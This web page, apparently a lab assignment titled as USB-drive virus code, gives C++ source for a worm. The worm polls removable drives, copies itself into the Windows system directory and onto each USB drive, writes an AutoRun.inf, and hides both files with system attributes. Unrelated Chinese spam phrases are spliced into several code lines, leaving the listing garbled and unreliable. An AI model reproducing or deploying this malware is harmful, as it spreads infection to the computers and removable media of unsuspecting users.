U盘病毒代码
1.PE病毒(修改所有的exe文件)
2.U盘病毒 (表现为U盘中会自动生成文件)
主要算法和程序清单: U 盘恶意代码;
// proj7_2.cpp : Defines the entry point for the application.
//
#include "stdafx.h"
bool SaveToFile(char* Path,char* Data){
HANDLE hFile;
中国绿卡
hFile=CreateFile(Path, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL,NULL);
if(hFile==INVALID_HANDLE_VALUE)
{/*continue; //出错时处理*/}
DWORD dwWrite;
WriteFile(hFile,Data,strlen(Data),&dwWrite,NULL);
CloseHandle(hFile);
return true;
红心火龙果为什么比白心火龙果甜
}
BOOL InfectU()
{ while(true)
{ UINT revtype;
char name[256]="H:\\" ;
char szName[256]={0};
char toPath[256]={0};
char infPath[256]={0};
char openU[80]={0};
//遍历所有盘符
for(BYTE i=0x42;i<0x5B;i=i+0x01)
{ name[0]=i; //得到盘符类型
revtype=GetDriveType(name);//判断是否是可移动存储设备
if (revtype==DRIVE_REMOVABLE)
{ //得到自身文件路径
GetModuleFileName(NULL,szName,256);
//比较是否和 U 盘的盘符相同 //如果相同说明在 U 盘上执行,复制到系统中去
if(strncmp(name,szName,1)==0)
{ //得到系统目录
GetSystemDirectory(toPath,256);
strcat(toPath,"\\");
//把自身文件复制到系统目录
if(CopyFile(szName,toPath,TRUE)) {
//运行程序
WinExec(toPath,0); }
strcpy(openU,"explorer ");
strcat(openU,name); //打开 U 盘
WinExec(openU,1); return 0; }//如果不是则 U 盘上执行,则感染 U 盘
else { strcpy(toPath,name);
strcat(toPath,"\\");
strcpy(infPath,name);
strcat(infPath,"\\AutoRun.inf"); //还原 U 盘上的文件属性
SetFileAttributes(toPath,FILE_ATTRIBUTE_NORMAL);
SetFileAttributes(infPath,FILE_ATTRIBUTE_NORMAL);
//删除原有文件
DeleteFile(toPath);
DeleteFile(infPath);
//写 AutoRun.inf 到 U 盘
歌手第十期排名char* Data;
Data = "[AutoRun]\r\nopen=\r\nshell\\open= 打 开 (&O)\r\
nshell\\explore=我的资源管理器(&X)\r\nshell\\explore\\Command=";
SaveToFile(infPath,Data); //拷贝自身文件到 U 盘
CopyFile(szName,toPath,FALSE); //把这两个文件设置成系统,隐藏属性
最好的防晒霜排行榜SetFileAttributes(toPath, FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_SYSTEM); SetFileAttributes(infPath, FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_SYSTEM);
中秋祝福语2022最火}
}
} //休眠 60 秒,60 检测一次
杨威微博Sleep(60000); } }
int APIENTRY WinMain
(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
{ InfectU();
return 0; }

版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系QQ:729038198,我们将在24小时内删除。